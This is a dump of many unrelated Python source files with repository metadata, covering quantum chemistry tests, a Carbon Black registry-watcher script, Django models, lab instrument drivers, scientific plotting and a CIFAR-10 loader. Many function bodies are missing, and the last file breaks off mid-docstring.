fe4e0e23c7947f7d713c88797190743b2b4ea285 | 1,450 | py | Python | openfermioncirq/variational/ansatzes/swap_network_trotter_hubbard_test.py | unpilbaek/OpenFermion-Cirq | d2f5a871bb5aea1e53d280c0a0e4be999b0c8d9d | [
"Apache-2.0"
] | 278 | 2018-07-18T23:43:16.000Z | 2022-01-02T21:38:08.000Z | openfermioncirq/variational/ansatzes/swap_network_trotter_hubbard_test.py | unpilbaek/OpenFermion-Cirq | d2f5a871bb5aea1e53d280c0a0e4be999b0c8d9d | [
"Apache-2.0"
] | 131 | 2018-07-18T19:04:58.000Z | 2020-08-04T21:05:42.000Z | openfermioncirq/variational/ansatzes/swap_network_trotter_hubbard_test.py | unpilbaek/OpenFermion-Cirq | d2f5a871bb5aea1e53d280c0a0e4be999b0c8d9d | [
"Apache-2.0"
] | 101 | 2018-07-18T21:43:50.000Z | 2022-03-04T09:51:02.000Z | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from openfermioncirq.variational.ansatzes import SwapNetworkTrotterHubbardAnsatz
| 41.428571 | 80 | 0.65931 |
fe4e2e11b7395e1b93b6ba3044a09072e2e8f08b | 1,230 | py | Python | Modules/Phylogenetic.py | DaneshMoradigaravand/PlasmidPerm | 7a84c1d4dbf7320dd5ba821ff0e715a89fe4b3e4 | [
"MIT"
] | null | null | null | Modules/Phylogenetic.py | DaneshMoradigaravand/PlasmidPerm | 7a84c1d4dbf7320dd5ba821ff0e715a89fe4b3e4 | [
"MIT"
] | null | null | null | Modules/Phylogenetic.py | DaneshMoradigaravand/PlasmidPerm | 7a84c1d4dbf7320dd5ba821ff0e715a89fe4b3e4 | [
"MIT"
] | null | null | null | import os
from Bio import AlignIO, Phylo
from Bio.Phylo.TreeConstruction import DistanceCalculator, DistanceTreeConstructor | 45.555556 | 102 | 0.71626 |
fe50481354faa15f773f5ba3bf0a4fb0f0ded16b | 8,854 | py | Python | retrieve_regmod_values.py | cbcommunity/cbapi-examples | f8a81006b27c724582b4b04c124eb97a8c8e75d3 | [
"MIT"
] | 17 | 2016-07-21T14:58:49.000Z | 2020-10-26T15:51:38.000Z | retrieve_regmod_values.py | cbcommunity/cbapi-examples | f8a81006b27c724582b4b04c124eb97a8c8e75d3 | [
"MIT"
] | 5 | 2017-06-07T02:42:09.000Z | 2019-10-23T12:26:29.000Z | retrieve_regmod_values.py | cbcommunity/cbapi-examples | f8a81006b27c724582b4b04c124eb97a8c8e75d3 | [
"MIT"
] | 9 | 2016-10-03T02:18:23.000Z | 2021-03-08T22:44:33.000Z | #!/usr/bin/env python
#
#The MIT License (MIT)
#
# Copyright (c) 2015 Bit9 + Carbon Black
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# -----------------------------------------------------------------------------
# Extension regmod watcher and grabber
#
# This script listens to the CB messaging bus for registry modification events,
# and when a modification is seen that matches a regular expression from a file
# of registry path regular expressions, it goes and grabs the registry value
# using CB Live Response.
#
# You need to make sure rabbitmq is enabled in cb.conf, and you might need to
# open a firewall rule for port 5004. You also will need to enable regmod
# in the DatastoreBroadcastEventTypes=<values> entry. If anything is changed
# here, you'll have to do service cb-enterprise restart.
#
# TODO: More error handling, more performance improvements
#
# last updated 2016-01-23 by Ben Johnson bjohnson@bit9.com (dev-support@bit9.com)
#
import re
import Queue
import sys
from threading import Thread
import time
import traceback
try:
from cbapi.legacy.util.cli_helpers import main_helper
from cbapi.legacy.util.composite_helpers import MessageSubscriberAndLiveResponseActor
import cbapi.legacy.util.sensor_events_pb2 as cpb
except ImportError:
from cbapi.util.cli_helpers import main_helper
from cbapi.util.composite_helpers import MessageSubscriberAndLiveResponseActor
import cbapi.util.sensor_events_pb2 as cpb
if __name__ == "__main__":
## YOU CAN USE data/autoruns_regexes.txt to test ##
required_args =[("-i", "--username", "store", None, "username", "CB messaging username"),
("-p", "--password", "store", None, "password", "CB messaging password"),
("-r", "--regpaths_file", "store", None, "regpaths_file", "File of newline delimited regexes for regpaths")]
optional_args = [("-v", "--verbose", "store_true", False, "verbose", "Enable verbose output")]
main_helper("Subscribe to message bus events and for each registry modification that matches one of our supplied regexes, go retrieve value.",
main,
custom_required=required_args,
custom_optional=optional_args)
| 42.980583 | 146 | 0.61588 |
fe509cc8fe00e2ec571d053ee6c5713299416d2c | 1,225 | py | Python | h/exceptions.py | ssin122/test-h | c10062ae23b690afaac0ab4af7b9a5a5e4b686a9 | [
"MIT"
] | 2 | 2021-11-07T23:14:54.000Z | 2021-11-17T10:11:55.000Z | h/exceptions.py | ssin122/test-h | c10062ae23b690afaac0ab4af7b9a5a5e4b686a9 | [
"MIT"
] | null | null | null | h/exceptions.py | ssin122/test-h | c10062ae23b690afaac0ab4af7b9a5a5e4b686a9 | [
"MIT"
] | 1 | 2017-03-12T00:18:33.000Z | 2017-03-12T00:18:33.000Z | # -*- coding: utf-8 -*-
"""Exceptions raised by the h application."""
from __future__ import unicode_literals
from h.i18n import TranslationString as _
# N.B. This class **only** covers exceptions thrown by API code provided by
# the h package. memex code has its own base APIError class.
| 27.222222 | 79 | 0.702041 |
fe52100e092cba8f28b9f872d87740877e78ee29 | 5,535 | py | Python | functest/opnfv_tests/openstack/shaker/shaker.py | opnfv-poc/functest | 4f54b282cabccef2a53e21c77c81b60fe890a8a4 | [
"Apache-2.0"
] | null | null | null | functest/opnfv_tests/openstack/shaker/shaker.py | opnfv-poc/functest | 4f54b282cabccef2a53e21c77c81b60fe890a8a4 | [
"Apache-2.0"
] | null | null | null | functest/opnfv_tests/openstack/shaker/shaker.py | opnfv-poc/functest | 4f54b282cabccef2a53e21c77c81b60fe890a8a4 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# Copyright (c) 2018 Orange and others.
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Apache License, Version 2.0
# which accompanies this distribution, and is available at
# http://www.apache.org/licenses/LICENSE-2.0
"""
Shaker_ wraps around popular system network testing tools like iperf, iperf3
and netperf (with help of flent). Shaker is able to deploy OpenStack instances
and networks in different topologies. Shaker scenario specifies the deployment
and list of tests to execute.
.. _Shaker: http://pyshaker.readthedocs.io/en/latest/
"""
import logging
import os
import json
import scp
from functest.core import singlevm
from functest.utils import env
| 37.910959 | 79 | 0.605239 |
fe52c241e006580225be521c666de64401063758 | 410 | py | Python | lib/models/bn_helper.py | hongrui16/naic2020_B | 9321bdd19e7d2d47ac9c711eb8437cd364e25f44 | [
"MIT"
] | null | null | null | lib/models/bn_helper.py | hongrui16/naic2020_B | 9321bdd19e7d2d47ac9c711eb8437cd364e25f44 | [
"MIT"
] | null | null | null | lib/models/bn_helper.py | hongrui16/naic2020_B | 9321bdd19e7d2d47ac9c711eb8437cd364e25f44 | [
"MIT"
] | null | null | null | import torch
import functools
if torch.__version__.startswith('0'):
from .sync_bn.inplace_abn.bn import InPlaceABNSync
BatchNorm2d = functools.partial(InPlaceABNSync, activation='none')
BatchNorm2d_class = InPlaceABNSync
relu_inplace = False
else:
# BatchNorm2d_class = BatchNorm2d = torch.nn.SyncBatchNorm
BatchNorm2d_class = BatchNorm2d = torch.nn.BatchNorm2d
relu_inplace = True | 34.166667 | 70 | 0.770732 |
fe551b06355686622edde6ba5da6a8305143cb35 | 2,193 | py | Python | ordered_model/tests/models.py | HiddenClever/django-ordered-model | c94709403cfbb35fa4da3d6470ead816096fdec8 | [
"BSD-3-Clause"
] | null | null | null | ordered_model/tests/models.py | HiddenClever/django-ordered-model | c94709403cfbb35fa4da3d6470ead816096fdec8 | [
"BSD-3-Clause"
] | null | null | null | ordered_model/tests/models.py | HiddenClever/django-ordered-model | c94709403cfbb35fa4da3d6470ead816096fdec8 | [
"BSD-3-Clause"
] | null | null | null | from django.db import models
from ordered_model.models import OrderedModel, OrderedModelBase
| 29.24 | 117 | 0.735522 |
fe5674a5616780733e828478139977dd1166a1db | 2,288 | py | Python | library/pandas_utils.py | SACGF/variantgrid | 515195e2f03a0da3a3e5f2919d8e0431babfd9c9 | [
"RSA-MD"
] | 5 | 2021-01-14T03:34:42.000Z | 2022-03-07T15:34:18.000Z | library/pandas_utils.py | SACGF/variantgrid | 515195e2f03a0da3a3e5f2919d8e0431babfd9c9 | [
"RSA-MD"
] | 551 | 2020-10-19T00:02:38.000Z | 2022-03-30T02:18:22.000Z | library/pandas_utils.py | SACGF/variantgrid | 515195e2f03a0da3a3e5f2919d8e0431babfd9c9 | [
"RSA-MD"
] | null | null | null | import os
import sys
import numpy as np
import pandas as pd
def get_columns_percent_dataframe(df: pd.DataFrame, totals_column=None, percent_names=True) -> pd.DataFrame:
""" @param totals_column: (default = use sum of columns)
@param percent_names: Rename names from 'col' => 'col %'
Return a dataframe as a percentage of totals_column if provided, or sum of columns """
percent_df = pd.DataFrame(index=df.index)
columns = df.columns
if totals_column:
totals_series = df[totals_column]
columns = columns - [totals_column]
else:
totals_series = df.sum(axis=1)
for col in columns:
new_col = col
if percent_names:
new_col = f"{new_col} %"
multiplier = 100.0 # to get percent
percent_df[new_col] = multiplier * df[col] / totals_series
return percent_df
def get_rows_percent_dataframe(df: pd.DataFrame) -> pd.DataFrame:
""" Return a dataframe as a percentage of sum of rows """
row_sums = df.sum(axis=0)
return df.multiply(100.0) / row_sums
def get_total_percent_dataframe(df: pd.DataFrame) -> pd.DataFrame:
""" Return a dataframe as a percentage of sum of rows """
total = df.sum(axis=0).sum()
return df.multiply(100.0) / total
| 28.6 | 108 | 0.649913 |
fe56b7b7af27f780f7fa9407871404e8b6436b3d | 1,587 | py | Python | app/services/base.py | grace1307/lan_mapper | 5d244078732b86a2e38a5b21436ffca83c689eeb | [
"MIT"
] | null | null | null | app/services/base.py | grace1307/lan_mapper | 5d244078732b86a2e38a5b21436ffca83c689eeb | [
"MIT"
] | null | null | null | app/services/base.py | grace1307/lan_mapper | 5d244078732b86a2e38a5b21436ffca83c689eeb | [
"MIT"
] | null | null | null | from app.db import db
# Ignore it if db can't find the row when updating/deleting
# Todo: not ignore it, raise some error, remove checkers in view
| 28.339286 | 91 | 0.609326 |
fe56cfdabfdb2c62e991e0ff5887c5fa113a7477 | 694 | py | Python | set.py | QUDUSKUNLE/Python-Flask | 5990572b17923c976907c2fa5c2a9790f3a7c869 | [
"MIT"
] | null | null | null | set.py | QUDUSKUNLE/Python-Flask | 5990572b17923c976907c2fa5c2a9790f3a7c869 | [
"MIT"
] | null | null | null | set.py | QUDUSKUNLE/Python-Flask | 5990572b17923c976907c2fa5c2a9790f3a7c869 | [
"MIT"
] | null | null | null | """
How to set up virtual environment
pip install virtualenv
pip install virtualenvwrapper
# export WORKON_HOME=~/Envs
source /usr/local/bin/virtualenvwrapper.sh
# To activate virtualenv and set up flask
1. mkvirtualenv my-venv
###2. workon my-venv
3. pip install Flask
4. pip freeze
5. # To put all dependencies in a file
pip freeze > requirements.txt
6. run.py: entry point of the application
7. relational database management system
SQLite, MYSQL, PostgreSQL
SQLAlchemy is an Object Relational Mapper (ORM),
which means that it connects the objects of an application to tables in a
relational database management system.
""" | 30.173913 | 79 | 0.714697 |
fe5734aaedd2488a65c2f70b6e6de6bc38f3f4ec | 1,346 | py | Python | test/test_generate_data_coassembly.py | Badboy-16/SemiBin | 501bc1a7e310104c09475ca233a3f16d081f129a | [
"MIT"
] | null | null | null | test/test_generate_data_coassembly.py | Badboy-16/SemiBin | 501bc1a7e310104c09475ca233a3f16d081f129a | [
"MIT"
] | null | null | null | test/test_generate_data_coassembly.py | Badboy-16/SemiBin | 501bc1a7e310104c09475ca233a3f16d081f129a | [
"MIT"
] | null | null | null | from SemiBin.main import generate_data_single
import os
import pytest
import logging
import pandas as pd | 42.0625 | 80 | 0.604012 |
fe5794e6af44c9c1406d19b02f67dd498db59356 | 2,676 | py | Python | create/create_args_test.py | CarbonROM/android_tools_acloud | 0ed5352df639789767d8ea6fe0a510d7a84cfdcc | [
"Apache-2.0"
] | null | null | null | create/create_args_test.py | CarbonROM/android_tools_acloud | 0ed5352df639789767d8ea6fe0a510d7a84cfdcc | [
"Apache-2.0"
] | null | null | null | create/create_args_test.py | CarbonROM/android_tools_acloud | 0ed5352df639789767d8ea6fe0a510d7a84cfdcc | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 - The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for create."""
import unittest
from unittest import mock
from acloud import errors
from acloud.create import create_args
from acloud.internal import constants
from acloud.internal.lib import driver_test_lib
def _CreateArgs():
"""set default pass in arguments."""
mock_args = mock.MagicMock(
flavor=None,
num=1,
adb_port=None,
hw_property=None,
stable_cheeps_host_image_name=None,
stable_cheeps_host_image_project=None,
username=None,
password=None,
cheeps_betty_image=None,
local_image=None,
local_kernel_image=None,
local_system_image=None,
system_branch=None,
system_build_id=None,
system_build_target=None,
local_instance=None,
remote_host=None,
host_user=constants.GCE_USER,
host_ssh_private_key_path=None,
avd_type=constants.TYPE_CF,
autoconnect=constants.INS_KEY_VNC)
return mock_args
# pylint: disable=invalid-name,protected-access
if __name__ == "__main__":
unittest.main()
| 32.240964 | 74 | 0.702167 |
fe57a342e2e561171bed3dec28d69a69629da501 | 452 | py | Python | setup.py | Kannuki-san/msman | adc275ad0508d65753c8424e7f6b94becee0b855 | [
"MIT"
] | null | null | null | setup.py | Kannuki-san/msman | adc275ad0508d65753c8424e7f6b94becee0b855 | [
"MIT"
] | null | null | null | setup.py | Kannuki-san/msman | adc275ad0508d65753c8424e7f6b94becee0b855 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
from cx_Freeze import setup,Executable
icondata='icon.ico'
base = None
# GUI=, CUI=
if sys.platform == 'win32' : base = 'win32GUI'
exe = Executable(script = 'main.py',
base = base,
#icon=icondata
)
setup(name = 'MSman',
version = '0.1',
description = 'Minecraft Server Manager',
executables = [exe]
) | 17.384615 | 47 | 0.550885 |
fe57f5cf47823b7ec7c95916bb4e6edc61679b1b | 2,903 | py | Python | stereotype/roles.py | petee-d/stereotype | 33a2efc826fd907bd23ffb4e8f7cba119ff022ce | [
"MIT"
] | 6 | 2021-05-26T10:45:50.000Z | 2022-01-31T17:36:10.000Z | stereotype/roles.py | petee-d/stereotype | 33a2efc826fd907bd23ffb4e8f7cba119ff022ce | [
"MIT"
] | null | null | null | stereotype/roles.py | petee-d/stereotype | 33a2efc826fd907bd23ffb4e8f7cba119ff022ce | [
"MIT"
] | null | null | null | from __future__ import annotations
from threading import Lock
from typing import List, Set, Optional, Any, Tuple
from stereotype.utils import ConfigurationError
_roles: List[Role] = []
_roles_lock = Lock()
DEFAULT_ROLE = Role('default')
| 34.975904 | 111 | 0.654151 |
fe59e0ae9caf8657811351b2ce6b7040c6d723dc | 7,175 | py | Python | WEB21-1-12/WEB2/power/zvl_test.py | coderdq/vuetest | 28ea4f36e2c4e7e80d1ba1777ef312733ef84048 | [
"MIT"
] | null | null | null | WEB21-1-12/WEB2/power/zvl_test.py | coderdq/vuetest | 28ea4f36e2c4e7e80d1ba1777ef312733ef84048 | [
"MIT"
] | null | null | null | WEB21-1-12/WEB2/power/zvl_test.py | coderdq/vuetest | 28ea4f36e2c4e7e80d1ba1777ef312733ef84048 | [
"MIT"
] | null | null | null | # coding:utf-8
'''
VSWR
10marker
'''
import os
import logging
from commoninterface.zvlbase import ZVLBase
logger = logging.getLogger('ghost')
| 34.830097 | 108 | 0.557073 |
fe5a25378e13e098be2b1cdb76f7062e2c91b9b5 | 2,410 | py | Python | kshell/partial_level_density.py | ErlendLima/70Zn | 1bf73adec5a3960e195788bc1f4bc79b2086be64 | [
"MIT"
] | null | null | null | kshell/partial_level_density.py | ErlendLima/70Zn | 1bf73adec5a3960e195788bc1f4bc79b2086be64 | [
"MIT"
] | null | null | null | kshell/partial_level_density.py | ErlendLima/70Zn | 1bf73adec5a3960e195788bc1f4bc79b2086be64 | [
"MIT"
] | null | null | null | from __future__ import division
import numpy as np
import matplotlib.pyplot as plt
import shellmodelutilities as smutil
# Set bin width and range
bin_width = 0.20
Emax = 14
Nbins = int(np.ceil(Emax/bin_width))
Emax_adjusted = bin_width*Nbins # Trick to get an integer number of bins
bins = np.linspace(0,Emax_adjusted,Nbins+1)
# Define list of calculation input files and corresponding label names
inputfile = "summary_Zn70_jun45.txt"
# Instantiate figure which we will fill
f_rho, ax_rho = plt.subplots(1,1)
# Read energy levels from file
levels = smutil.read_energy_levels(inputfile)
# Choose which [2*J,pi] combinations to include in partial level density plot
Jpi_list = [[0,-1],[2,-1],[4,-1],[6,-1],[8,-1],[10,-1],[12,-1],[14,-1],[16,-1],[18,-1],[20,-1],[22,-1],[24,-1],[26,-1],[28,-1],
[0,+1],[2,+1],[4,+1],[6,+1],[8,+1],[10,+1],[12,+1],[14,+1],[16,+1],[18,+1],[20,+1],[22,+1],[24,+1],[26,+1],[28,+1]]
# Allocate (Ex,Jpi) matrix to store partial level density
rho_ExJpi = np.zeros((Nbins,len(Jpi_list)))
# Count number of levels for each (Ex, J, pi) pixel.
Egs = levels[0,0] # Ground state energy
for i_l in range(len(levels[:,0])):
E, J, pi = levels[i_l]
# Skip if level is outside range:
if E-Egs >= Emax:
continue
i_Ex = int(np.floor((E-Egs)/bin_width))
try:
i_Jpi = Jpi_list.index([J,pi])
except:
continue
rho_ExJpi[i_Ex,i_Jpi] += 1
rho_ExJpi /= bin_width # Normalize to bin width, to get density in MeV^-1
# Plot it
from matplotlib.colors import LogNorm # To get log scaling on the z axis
colorbar_object = ax_rho.pcolormesh(np.linspace(0,len(Jpi_list)-1,len(Jpi_list)), bins, rho_ExJpi, norm=LogNorm())
f_rho.colorbar(colorbar_object) # Add colorbar to plot
# Make the plot nice
ax_rho.set_xlabel(r"$\pi\cdot J\,\mathrm{(\hbar)}$")
ax_rho.set_ylabel(r'$E_x \, \mathrm{(MeV)}$')
# A bit of Python voodoo to get the x labels right:
Jpi_array = np.append(np.linspace(0,-int((len(Jpi_list)-1)/2),int(len(Jpi_list)/2)),np.linspace(0,int((len(Jpi_list)-1)/2),int(len(Jpi_list)/2))) # Array of pi*J for plot
ax_rho.set_xlim([0,29])
ax_rho.xaxis.set_major_formatter(plt.FuncFormatter(format_func))
ax_rho.set_xticks([0,2,4,6,8,10,12,14,15,17,19,21,23,25,27])
# Show plot
plt.show()
| 34.927536 | 170 | 0.674274 |
fe5b20986b78369a49dfb31999fcc5213f36f3e2 | 15,480 | py | Python | tests/integration/test_provider_base.py | neuro-inc/platform-buckets-api | ba04edeb8565fa06e5af6d0316957a8816b087b2 | [
"Apache-2.0"
] | null | null | null | tests/integration/test_provider_base.py | neuro-inc/platform-buckets-api | ba04edeb8565fa06e5af6d0316957a8816b087b2 | [
"Apache-2.0"
] | 55 | 2021-11-16T00:26:52.000Z | 2022-03-29T03:16:55.000Z | tests/integration/test_provider_base.py | neuro-inc/platform-buckets-api | ba04edeb8565fa06e5af6d0316957a8816b087b2 | [
"Apache-2.0"
] | null | null | null | import abc
import secrets
from collections.abc import AsyncIterator, Awaitable, Callable, Mapping
from contextlib import AbstractAsyncContextManager, asynccontextmanager
from dataclasses import dataclass
from datetime import datetime, timezone
import pytest
from aiohttp import ClientSession
from yarl import URL
from platform_buckets_api.providers import (
BucketExistsError,
BucketNotExistsError,
BucketPermission,
BucketProvider,
RoleExistsError,
UserBucketOperations,
)
from platform_buckets_api.storage import ImportedBucket, ProviderBucket
BUCKET_NAME_PREFIX = "integration-tests-"
ROLE_NAME_PREFIX = "integration-tests-"
def as_admin_cm(
creator_func: Callable[[ProviderBucket], BasicBucketClient]
) -> Callable[[ProviderBucket], AbstractAsyncContextManager[BasicBucketClient]]:
return creator
# Access checkers
class TestProviderBase:
__test__ = False
| 35.022624 | 88 | 0.655749 |
fe5b28c8c0a814b5544650e3dacd259358d5495e | 4,972 | py | Python | sbpy/photometry/bandpass.py | jianyangli/sbpy | 6b79cbea9bada89207fba17d02dc0c321fa46bf4 | [
"BSD-3-Clause"
] | 1 | 2017-11-28T02:58:51.000Z | 2017-11-28T02:58:51.000Z | sbpy/photometry/bandpass.py | jianyangli/sbpy | 6b79cbea9bada89207fba17d02dc0c321fa46bf4 | [
"BSD-3-Clause"
] | null | null | null | sbpy/photometry/bandpass.py | jianyangli/sbpy | 6b79cbea9bada89207fba17d02dc0c321fa46bf4 | [
"BSD-3-Clause"
] | null | null | null | # Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
sbpy bandpass Module
"""
__all__ = [
'bandpass'
]
import os
from astropy.utils.data import get_pkg_data_filename
def bandpass(name):
"""Retrieve bandpass transmission spectrum from sbpy.
Parameters
----------
name : string
Name of the bandpass, case insensitive. See notes for
available filters.
Returns
-------
bp : `~synphot.SpectralElement`
Notes
-----
Available filters:
+-------------+---------------------------+
| Name | Source |
+=============+===========================+
| 2MASS J | Cohen et al. 2003 |
+-------------+---------------------------+
| 2MASS H | Cohen et al. 2003 |
+-------------+---------------------------+
| 2MASS Ks | Cohen et al. 2003 |
+-------------+---------------------------+
| Cousins R | STScI CDBS, v4 |
+-------------+---------------------------+
| Cousins I | STScI CDBS, v4 |
+-------------+---------------------------+
| Johnson U | STScI CDBS, v4 |
+-------------+---------------------------+
| Johnson B | STScI CDBS, v4 |
+-------------+---------------------------+
| Johnson V | STScI CDBS, v4 |
+-------------+---------------------------+
| PS1 g | Tonry et al. 2012 |
+-------------+---------------------------+
| PS1 r | Tonry et al. 2012 |
+-------------+---------------------------+
| PS1 i | Tonry et al. 2012 |
+-------------+---------------------------+
| PS1 w | Tonry et al. 2012 |
+-------------+---------------------------+
| PS1 y | Tonry et al. 2012 |
+-------------+---------------------------+
| PS1 z | Tonry et al. 2012 |
+-------------+---------------------------+
| SDSS u | SDSS, dated 2001 |
+-------------+---------------------------+
| SDSS g | SDSS, dated 2001 |
+-------------+---------------------------+
| SDSS r | SDSS, dated 2001 |
+-------------+---------------------------+
| SDSS i | SDSS, dated 2001 |
+-------------+---------------------------+
| SDSS z | SDSS, dated 2001 |
+-------------+---------------------------+
| WFC3 F438W | HST/WFC3 UVIS, v4 |
+-------------+---------------------------+
| WFC3 F606W | HST/WFC3 UVIS, v4 |
+-------------+---------------------------+
| WISE W1 | Jarrett et al. 2011 |
+-------------+---------------------------+
| WISE W2 | Jarrett et al. 2011 |
+-------------+---------------------------+
| WISE W3 | Jarrett et al. 2011 |
+-------------+---------------------------+
| WISE W4 | Jarrett et al. 2011 |
+-------------+---------------------------+
References
----------
.. [CDBS] Space Telescope Science Institute. HST Calibration Reference
Data System. https://hst-crds.stsci.edu/ .
.. [COH03] Cohen, M. et al. 2003. Spectral Irradiance Calibration
in the Infrared. XIV. The Absolute Calibration of 2MASS. AJ
126, 1090.
.. [JAR11] Jarrett, T. H. et al. 2011. The Spitzer-WISE Survey of
the Ecliptic Poles. ApJ 735, 112.
.. [SDSS] Sloan Digital Sky Survey. Camera.
www.sdss.org/instruments/camera .
.. [TON12] Tonry, J. L. et al. 2012. The Pan-STARRS1 Photometric
System. ApJ 750, 99.
"""
try:
import synphot
except ImportError:
raise ImportError('synphot is required.')
name2file = {
'2mass j': '2mass-j-rsr.txt',
'2mass h': '2mass-h-rsr.txt',
'2mass ks': '2mass-ks-rsr.txt',
'cousins r': 'cousins_r_004_syn.fits',
'cousins i': 'cousins_i_004_syn.fits',
'johnson u': 'johnson_u_004_syn.fits',
'johnson b': 'johnson_b_004_syn.fits',
'johnson v': 'johnson_v_004_syn.fits',
'ps1 g': 'ps1-gp1.txt',
'ps1 r': 'ps1-rp1.txt',
'ps1 i': 'ps1-ip1.txt',
'ps1 w': 'ps1-wp1.txt',
'ps1 y': 'ps1-yp1.txt',
'ps1 z': 'ps1-zp1.txt',
'sdss u': 'sdss-u.fits',
'sdss g': 'sdss-g.fits',
'sdss r': 'sdss-r.fits',
'sdss i': 'sdss-i.fits',
'sdss z': 'sdss-z.fits',
'wfc3 f438w': 'wfc3_uvis_f438w_004_syn.fits',
'wfc3 f606w': 'wfc3_uvis_f606w_004_syn.fits',
'wise w1': 'WISE-RSR-W1.EE.txt',
'wise w2': 'WISE-RSR-W2.EE.txt',
'wise w3': 'WISE-RSR-W3.EE.txt',
'wise w4': 'WISE-RSR-W4.EE.txt',
}
fn = get_pkg_data_filename(os.path.join(
'..', 'photometry', 'data', name2file[name.lower()]))
bp = synphot.SpectralElement.from_file(fn)
return bp
| 34.054795 | 75 | 0.377715 |
fe5bf9f4fe33b1e74de5e5a8a91381afcd0d937c | 576 | py | Python | appserver/search/views.py | sinag/SWE574-Horuscope | 9725dd356cbfd19f0ce88d4a208c872be765bd88 | [
"MIT"
] | null | null | null | appserver/search/views.py | sinag/SWE574-Horuscope | 9725dd356cbfd19f0ce88d4a208c872be765bd88 | [
"MIT"
] | null | null | null | appserver/search/views.py | sinag/SWE574-Horuscope | 9725dd356cbfd19f0ce88d4a208c872be765bd88 | [
"MIT"
] | 1 | 2020-08-07T12:54:51.000Z | 2020-08-07T12:54:51.000Z | from django.http import HttpResponse
from django.shortcuts import render, redirect
from community.models import Community
# Create your views here.
| 30.315789 | 88 | 0.744792 |
fe5c54cf485f5924948c2f9e92bdf0e6152fda9f | 1,566 | py | Python | teams/migrations/0001_initial.py | Sudani-Coder/teammanager | 857082bc14d7a783d2327b4e982edba7c061f303 | [
"MIT"
] | null | null | null | teams/migrations/0001_initial.py | Sudani-Coder/teammanager | 857082bc14d7a783d2327b4e982edba7c061f303 | [
"MIT"
] | null | null | null | teams/migrations/0001_initial.py | Sudani-Coder/teammanager | 857082bc14d7a783d2327b4e982edba7c061f303 | [
"MIT"
] | null | null | null | # Generated by Django 3.1.2 on 2020-10-18 17:19
from django.db import migrations, models
| 36.418605 | 141 | 0.541507 |
fe5c97158341c4d0d209389c3a2affb30b2d34bf | 9,772 | py | Python | qcodes_contrib_drivers/drivers/Oxford/ILM200.py | jenshnielsen/Qcodes_contrib_drivers | dc878cdd99a62f4643a62163a3a6341f98cee440 | [
"MIT"
] | null | null | null | qcodes_contrib_drivers/drivers/Oxford/ILM200.py | jenshnielsen/Qcodes_contrib_drivers | dc878cdd99a62f4643a62163a3a6341f98cee440 | [
"MIT"
] | 2 | 2020-05-29T11:00:52.000Z | 2020-10-09T06:18:11.000Z | qcodes_contrib_drivers/drivers/Oxford/ILM200.py | jenshnielsen/Qcodes_contrib_drivers | dc878cdd99a62f4643a62163a3a6341f98cee440 | [
"MIT"
] | 1 | 2020-04-24T01:15:44.000Z | 2020-04-24T01:15:44.000Z | # OxfordInstruments_ILM200.py class, to perform the communication between the Wrapper and the device
# Copyright (c) 2017 QuTech (Delft)
# Code is available under the available under the `MIT open-source license <https://opensource.org/licenses/MIT>`__
#
# Pieter Eendebak <pieter.eendebak@tno.nl>, 2017
# Takafumi Fujita <t.fujita@tudelft.nl>, 2016
# Guenevere Prawiroatmodjo <guen@vvtp.tudelft.nl>, 2009
# Pieter de Groot <pieterdegroot@gmail.com>, 2009
from time import sleep
import visa
import logging
from qcodes import VisaInstrument
| 32.144737 | 115 | 0.556283 |
fe5cdd0275ff0c38add8e228ff02333ee397a98c | 4,417 | py | Python | load_cifar_10.py | xgxofdream/CNN-Using-Local-CIFAR-10-dataset | 8076056da58a5b564ded50f4cdb059585deb900d | [
"Apache-2.0"
] | null | null | null | load_cifar_10.py | xgxofdream/CNN-Using-Local-CIFAR-10-dataset | 8076056da58a5b564ded50f4cdb059585deb900d | [
"Apache-2.0"
] | null | null | null | load_cifar_10.py | xgxofdream/CNN-Using-Local-CIFAR-10-dataset | 8076056da58a5b564ded50f4cdb059585deb900d | [
"Apache-2.0"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
import pickle
"""
The CIFAR-10 dataset consists of 60000 32x32 colour images in 10 classes, with 6000 images per class. There are 50000
training images and 10000 test images.
The dataset is divided into five training batches and one test batch, each with 10000 images. The test batch contains
exactly 1000 randomly-selected images from each class. The training batches contain the remaining images in random
order, but some training batches may contain more images from one class than another. Between them, the training
batches contain exactly 5000 images from each class.
"""
def unpickle(file):
"""load the cifar-10 data"""
with open(file, 'rb') as fo:
data = pickle.load(fo, encoding='bytes')
return data
def load_cifar_10_data(data_dir, negatives=False):
"""
